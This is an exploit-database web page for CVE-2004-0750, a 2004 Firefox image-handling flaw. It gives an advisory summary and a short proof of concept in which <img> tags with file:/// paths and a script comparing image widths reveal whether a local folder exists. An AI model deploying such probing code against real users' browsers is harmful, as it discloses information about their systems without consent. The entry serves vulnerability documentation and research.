Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Multiple Vulnerabilities in Image Handling Functionality in Browsers - exploit.company
header-logo
Suggest Exploit
vendor:
Firefox
by:
5.5
CVSS
MEDIUM
Image Handling Vulnerabilities
200
CWE
Product Name: Firefox
Affected Version From: Mozilla Firefox 0.10.1 and prior versions
Affected Version To: Mozilla Firefox 0.10.1
Patch Exists: NO
Related CWE: CVE-2004-0750
CPE: a:mozilla:firefox:0.10.1
Metasploit:
Other Scripts:
Platforms Tested: Windows
2004

Multiple Vulnerabilities in Image Handling Functionality in Browsers

The vulnerabilities in the image handling functionality through the <IMG> tag can allow remote attackers to determine the existence of local files, cause a denial of service condition, and disclose passwords for Windows systems via file shares.

Mitigation:

Users are advised to update to the latest version of the affected browsers.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/11645/info

Various browsers are reported prone to multiple vulnerabilities in the image handling functionality through the <IMG> tag. These issues can allow remote attackers to determine the existence of local files, cause a denial of service condition, and disclose passwords for Windows systems via file shares.

Mozilla Firefox 0.10.1 and prior versions are reported vulnerable to these issues. It is alleged that Microsoft Internet Explorer and Netscape Browsers are also vulnerable to these issues. Due to this vulnerable packages for Internet Explorer and Netscape have been added. This BID will be updated as more information becomes available.

<img src="file:///c|/nonexistent/content.gif">
<img src="file:///c|/windows/content.gif">

<script>
onload =function(){
incl=(document.images[0].width!=document.images[1].width)? "" :"not ";
alert("Windows is "+ incl +"installed in C:/WINDOWS/");
}
</script>